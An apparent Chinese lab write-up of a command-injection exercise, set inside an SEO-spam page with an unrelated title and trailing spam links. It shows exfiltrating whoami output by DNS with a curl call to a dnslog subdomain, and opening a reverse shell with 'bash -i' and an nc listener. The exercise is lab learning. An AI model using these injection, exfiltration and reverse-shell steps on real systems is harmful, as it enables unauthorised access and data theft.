当前位置: 首页 > news >正文

设计本装修家居深圳网站优化软件

设计本装修家居,深圳网站优化软件,wordpress各版本下载,网站建设相关优化任务一: 复现环境中的命令注入漏洞。 任务二: 利用命令注入执行whoami,使用DNS外带技术获取结果 任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。 任务一: 1.搭建好环境 2.先去了…

任务一:
复现环境中的命令注入漏洞。
任务二:
利用命令注入执行whoami,使用DNS外带技术获取结果
任务三:使用反弹shell,将漏洞环境中的shell反弹到宿主机或者vps服务器。

任务一:
1.搭建好环境
在这里插入图片描述
在这里插入图片描述
2.先去了解一下这个网站的功能
在这里插入图片描述
在这里插入图片描述
3.首先查看存在的metric,发现在这里是0
在这里插入图片描述
4.我们写入一个metric,首先利用burpsuite进行抓包然后用post请求添加请求体加入metric,然后我们再次查看metrics发现我们已经成功写入一个metric。
在这里插入图片描述
在这里插入图片描述
5.然后进行代码执行漏洞,在tmp下创建一个success文件,得到回显

在这里插入图片描述

在这里插入图片描述
6.然后进入容器中查看(一定要查看创建的文件路径,其他的包含任何的都不是,因为这个找了好久好久,其实很早就做出来了,还以为做错了,无语死了)。

在这里插入图片描述
任务二:
1.直接把输出的whoami重定向到1.txt文件里面(中间要用%20作为空格,不然会失败,因为这个卡了好久,看到burpsuite的颜色那里不对了)

在这里插入图片描述
2.查看1.txt文件,发现我是root。
在这里插入图片描述

3.如果是利用DNS外带技术获得结果的话
首先登入dnslog.cn,然后点击get subdomain获得专属的子域名。
在这里插入图片描述
4.然后使用curl $(whoami).子域名,然后上面回显的时候出现了(root.子域名),得到(这里有一个问题,最开始用的ping,一直没ping通,不知道为啥)
在这里插入图片描述
任务三:
1.用(bash -c “bash -i ·········“)
在这里插入图片描述
2.这里试了很久自己的反弹shell都不成功,然后试了很多次,先是把端口打开了,用ufw添加端口 ufw allow +端口,然后把自己的nc变成了 nc -lvp +端口,然后再sec一次,反弹成功了。
在这里插入图片描述

在这里插入图片描述

http://www.15wanjia.com/news/38047.html

相关文章:

  • 丹东供求园初学seo网站推广需要怎么做
  • 注册域名 不建网站网络推广软件
  • 做设计哪个网站可以接单长沙网站快速排名提升
  • 卖域名的网站要怎么做百度推广管理平台
  • 网站目录做别的内容网站推广排名服务
  • 英文网站怎么设计品牌营销战略
  • 电子商城建设网站深圳营销型网站
  • wordpress 更改数据表哈尔滨百度搜索排名优化
  • 沈阳网站制作流程优化营商环境心得体会
  • 如何进行网站管理现在网络推广方式
  • 网吧网站怎么做的怎样做平台推广
  • 简约 网站 设计石家庄
  • 网站产品后台界面怎么做seo草根博客
  • 公司的网站建设与维护成都谷歌seo
  • 北京做网站youyi51百度搜索广告推广
  • 长治长治那有做网站的google网页版
  • 怎么用ftpxp做网站搜索引擎优化解释
  • 怎么才能创个网站郑州高端网站建设
  • 合肥 做网站的公司做个网站多少钱
  • 合肥品牌网站建设营销宣传方案
  • php对比java做网站种子搜索引擎
  • 青岛做网站公司有哪些seo外链建设的方法有
  • 随州网站建设学习百度搜索引擎收录入口
  • 网站搭建费用下载百度2024最新版
  • 买了一个域名如何做网站免费ip地址代理
  • 云电脑免费版永久使用seo网页优化培训
  • 宜春网站建设搜索优化
  • 在哪些网站上做推广好网站推广手段
  • 网站的空间是什么意思徐州seo网站推广
  • 青岛做模板网站的公司b站官方推广